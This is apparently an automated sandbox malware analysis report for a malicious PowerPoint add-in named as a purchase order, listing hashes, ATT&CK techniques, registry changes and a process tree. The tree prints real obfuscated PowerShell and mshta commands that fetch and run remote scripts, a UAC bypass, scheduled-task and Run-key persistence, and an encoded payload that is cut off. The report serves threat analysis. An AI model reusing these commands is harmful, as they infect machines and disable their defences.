0e9423c6b3d555a01513b11f32ab37696a240a469b496b64c01069c40e636447

Resubmissions

25-08-2021 09:54

210825-79rzfjvlw2 10

25-08-2021 09:51

210825-tbz8595366 10

28-04-2021 22:50

210428-csmgr8bxe2 10

Analysis

max time kernel
46s
max time network
137s
platform
windows10_x64
resource
win10v20210408
submitted
25-08-2021 09:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO - CE AUSTRALIA PTY LTD.ppam
Size

10KB
MD5

7c629522213c57c3b3d66ee8e6c13fed
SHA1

352b55636c67a5cd27a998888df0a137ef5433d8
SHA256

a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
SHA512

385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b

Score

10^/10

evasion persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/files/0x000100000001ab57-658.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2572	580	mshta.exe	67
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4368	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4632	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4876	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4804	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3844	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	3612	powershell.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4328	3612	powershell.exe	47

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Blocklisted process makes network request 19 IoCs

flow	pid	Process
31	2572	mshta.exe
33	2572	mshta.exe
35	2572	mshta.exe
37	2572	mshta.exe
39	2572	mshta.exe
40	2572	mshta.exe
42	2572	mshta.exe
44	2572	mshta.exe
45	2572	mshta.exe
49	2572	mshta.exe
50	2572	mshta.exe
51	2572	mshta.exe
52	2572	mshta.exe
54	516	powershell.exe
56	2572	mshta.exe
58	2400	powershell.exe
62	2400	powershell.exe
63	2400	powershell.exe
64	2400	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4168	2572	WerFault.exe	81

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3576	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
3356	taskkill.exe
1224	taskkill.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Public\\batman.bat"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
580	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
516	powershell.exe
516	powershell.exe
516	powershell.exe
2400	powershell.exe
2400	powershell.exe
2400	powershell.exe
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
2400	powershell.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
1864	powershell.exe
4368	powershell.exe
4360	powershell.exe
4360	powershell.exe
4368	powershell.exe
4368	powershell.exe
4632	powershell.exe
4632	powershell.exe
4360	powershell.exe
4368	powershell.exe
4876	powershell.exe
4876	powershell.exe
4632	powershell.exe
4360	powershell.exe
5020	powershell.exe
5020	powershell.exe
4876	powershell.exe
4632	powershell.exe
4632	powershell.exe
1556	powershell.exe
1556	powershell.exe
2476	powershell.exe
2476	powershell.exe
5020	powershell.exe
4804	powershell.exe
4804	powershell.exe
4876	powershell.exe
4876	powershell.exe
1556	powershell.exe
2476	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	4168	WerFault.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
580	POWERPNT.EXE

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
580	POWERPNT.EXE
580	POWERPNT.EXE
580	POWERPNT.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 580 wrote to memory of 2572	580	POWERPNT.EXE	81
PID 580 wrote to memory of 2572	580	POWERPNT.EXE	81
PID 2572 wrote to memory of 516	2572	mshta.exe	82
PID 2572 wrote to memory of 516	2572	mshta.exe	82
PID 2572 wrote to memory of 3768	2572	mshta.exe	85
PID 2572 wrote to memory of 3768	2572	mshta.exe	85
PID 2572 wrote to memory of 3576	2572	mshta.exe	87
PID 2572 wrote to memory of 3576	2572	mshta.exe	87
PID 3768 wrote to memory of 2400	3768	cmd.exe	89
PID 3768 wrote to memory of 2400	3768	cmd.exe	89
PID 2572 wrote to memory of 3356	2572	mshta.exe	93
PID 2572 wrote to memory of 3356	2572	mshta.exe	93
PID 2572 wrote to memory of 1224	2572	mshta.exe	94
PID 2572 wrote to memory of 1224	2572	mshta.exe	94
PID 516 wrote to memory of 4112	516	powershell.exe	99
PID 516 wrote to memory of 4112	516	powershell.exe	99
PID 4112 wrote to memory of 4200	4112	WScript.exe	100
PID 4112 wrote to memory of 4200	4112	WScript.exe	100
PID 4200 wrote to memory of 4580	4200	fodhelper.exe	101
PID 4200 wrote to memory of 4580	4200	fodhelper.exe	101
PID 4580 wrote to memory of 4928	4580	cmd.exe	103
PID 4580 wrote to memory of 4928	4580	cmd.exe	103
PID 4928 wrote to memory of 5048	4928	WScript.exe	104
PID 4928 wrote to memory of 5048	4928	WScript.exe	104

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\SYSTEM32\mshta.exe
  mshta http://www.j.mp/llsoaskokcdokoktewelvw
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
    3⤵
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:516
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\kuchb.vbs"
      4⤵
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:4112
    - - C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\batman.bat" "
        6⤵
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4580
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\clone.vbs"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4928
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\clone.vbs" /elevate
        8⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:5048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2400
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/19.html\"
    3⤵
    - Creates scheduled task(s)
    PID:3576
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3356
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2572 -s 2816
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $pitllasmd='>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>56>>>07>>>97>>>45>>>07>>>57>>>47>>>27>>>16>>>47>>>35>>>d2>>>02>>>46>>>e6>>>56>>>66>>>56>>>44>>>e6>>>96>>>75>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>35>>>d2>>>47>>>56>>>35>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>56>>>37>>>c6>>>16>>>66>>>42>>>a3>>>d6>>>27>>>96>>>66>>>e6>>>f6>>>34>>>d2>>>02>>>46>>>e6>>>56>>>66>>>56>>>44>>>e6>>>96>>>75>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>35>>>d2>>>07>>>f6>>>47>>>35>>>a0>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>f6>>>47>>>02>>>47>>>96>>>02>>>47>>>56>>>37>>>02>>>46>>>e6>>>16>>>02>>>56>>>36>>>96>>>67>>>27>>>56>>>37>>>02>>>56>>>86>>>47>>>02>>>07>>>f6>>>47>>>37>>>02>>>32>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>46>>>27>>>f6>>>75>>>44>>>02>>>56>>>07>>>97>>>45>>>d2>>>02>>>13>>>02>>>56>>>57>>>c6>>>16>>>65>>>d2>>>02>>>22>>>56>>>27>>>16>>>77>>>97>>>07>>>35>>>96>>>47>>>e6>>>14>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>22>>>02>>>56>>>d6>>>16>>>e4>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>02>>>97>>>47>>>27>>>56>>>07>>>f6>>>27>>>05>>>d6>>>56>>>47>>>94>>>d2>>>47>>>56>>>35>>>a0>>>d7>>>a0>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>27>>>56>>>e6>>>96>>>16>>>47>>>e6>>>f6>>>34>>>02>>>56>>>07>>>97>>>45>>>d6>>>56>>>47>>>94>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>02>>>d6>>>56>>>47>>>94>>>d2>>>77>>>56>>>e4>>>02>>>02>>>02>>>02>>>a0>>>b7>>>02>>>92>>>92>>>27>>>56>>>e6>>>96>>>16>>>47>>>e6>>>f6>>>34>>>02>>>56>>>07>>>97>>>45>>>86>>>47>>>16>>>05>>>d2>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>02>>>86>>>47>>>16>>>05>>>d2>>>47>>>37>>>56>>>45>>>82>>>12>>>82>>>02>>>66>>>96>>>a0>>>22>>>27>>>56>>>46>>>e6>>>56>>>66>>>56>>>44>>>02>>>37>>>77>>>f6>>>46>>>e6>>>96>>>75>>>c5>>>47>>>66>>>f6>>>37>>>f6>>>27>>>36>>>96>>>d4>>>c5>>>37>>>56>>>96>>>36>>>96>>>c6>>>f6>>>05>>>c5>>>54>>>25>>>14>>>75>>>45>>>64>>>f4>>>35>>>c5>>>a3>>>d4>>>c4>>>b4>>>84>>>22>>>02>>>d3>>>02>>>86>>>47>>>16>>>07>>>76>>>56>>>27>>>42>>>a0>>>a0>>>46>>>e6>>>56>>>35>>>27>>>56>>>67>>>56>>>e4>>>02>>>47>>>e6>>>56>>>37>>>e6>>>f6>>>34>>>37>>>56>>>c6>>>07>>>d6>>>16>>>35>>>47>>>96>>>d6>>>26>>>57>>>35>>>d2>>>02>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>76>>>e6>>>96>>>47>>>27>>>f6>>>07>>>56>>>25>>>35>>>05>>>14>>>d4>>>d2>>>02>>>56>>>36>>>27>>>f6>>>64>>>d2>>>02>>>56>>>46>>>f6>>>d4>>>47>>>96>>>46>>>57>>>14>>>02>>>e6>>>f6>>>96>>>47>>>36>>>56>>>47>>>f6>>>27>>>05>>>b6>>>27>>>f6>>>77>>>47>>>56>>>e4>>>56>>>c6>>>26>>>16>>>e6>>>54>>>d2>>>02>>>46>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>02>>>37>>>37>>>56>>>36>>>36>>>14>>>27>>>56>>>46>>>c6>>>f6>>>64>>>46>>>56>>>c6>>>c6>>>f6>>>27>>>47>>>e6>>>f6>>>34>>>56>>>c6>>>26>>>16>>>e6>>>54>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>76>>>e6>>>96>>>e6>>>e6>>>16>>>36>>>35>>>47>>>07>>>96>>>27>>>36>>>35>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>76>>>e6>>>96>>>27>>>f6>>>47>>>96>>>e6>>>f6>>>d4>>>56>>>d6>>>96>>>47>>>c6>>>16>>>56>>>25>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>e6>>>f6>>>96>>>47>>>36>>>56>>>47>>>f6>>>27>>>05>>>65>>>14>>>f4>>>94>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>57>>>27>>>47>>>42>>>02>>>d6>>>56>>>47>>>37>>>97>>>35>>>e6>>>f6>>>96>>>47>>>e6>>>56>>>67>>>56>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>27>>>47>>>e6>>>94>>>56>>>c6>>>26>>>16>>>37>>>96>>>44>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>47>>>56>>>35>>>a0>>>a0>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>e2>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>e2>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>47>>>56>>>74>>>02>>>d3>>>02>>>37>>>66>>>56>>>27>>>07>>>42>>>a0>>>a0>>>22>>>a3>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>27>>>57>>>f6>>>95>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>a0>>>22>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>a0>>>a0>>>d7>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>02>>>02>>>02>>>02>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>22>>>02>>>a3>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>37>>>37>>>56>>>36>>>f6>>>27>>>05>>>02>>>76>>>e6>>>96>>>46>>>46>>>14>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>02>>>02>>>02>>>02>>>a0>>>b7>>>a0>>>92>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>02>>>e6>>>96>>>02>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>82>>>02>>>86>>>36>>>16>>>56>>>27>>>f6>>>66>>>a0>>>a0>>>d7>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>02>>>02>>>02>>>02>>>a0>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>02>>>22>>>02>>>a3>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>02>>>86>>>47>>>16>>>05>>>02>>>76>>>e6>>>96>>>46>>>46>>>14>>>22>>>02>>>47>>>37>>>f6>>>84>>>d2>>>56>>>47>>>96>>>27>>>75>>>02>>>02>>>02>>>02>>>a0>>>b7>>>a0>>>02>>>92>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>86>>>47>>>16>>>07>>>42>>>02>>>e6>>>96>>>02>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>56>>>42>>>82>>>02>>>86>>>36>>>16>>>56>>>27>>>f6>>>66>>>a0>>>a0>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>02>>>86>>>47>>>16>>>05>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>d2>>>02>>>56>>>36>>>e6>>>56>>>27>>>56>>>66>>>56>>>27>>>05>>>07>>>d4>>>d2>>>46>>>46>>>14>>>a0>>>a0>>>a0>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>47>>>07>>>96>>>27>>>36>>>37>>>77>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>46>>>d6>>>36>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>47>>>37>>>f6>>>86>>>e6>>>f6>>>36>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>16>>>47>>>86>>>37>>>d6>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>c6>>>c6>>>56>>>86>>>37>>>27>>>56>>>77>>>f6>>>07>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>36>>>c6>>>16>>>34>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>36>>>37>>>a6>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>c6>>>96>>>47>>>55>>>c6>>>c6>>>16>>>47>>>37>>>e6>>>94>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>d6>>>37>>>16>>>c6>>>96>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>>>87>>>56>>>e2>>>37>>>56>>>27>>>47>>>67>>>36>>>72>>>82>>>46>>>46>>>14>>>e2>>>37>>>e6>>>f6>>>96>>>37>>>57>>>c6>>>36>>>87>>>54>>>37>>>37>>>56>>>36>>>f6>>>27>>>07>>>42>>>a0>>>c6>>>c6>>>57>>>e6>>>42>>>02>>>e3>>>02>>>92>>>72>>>56>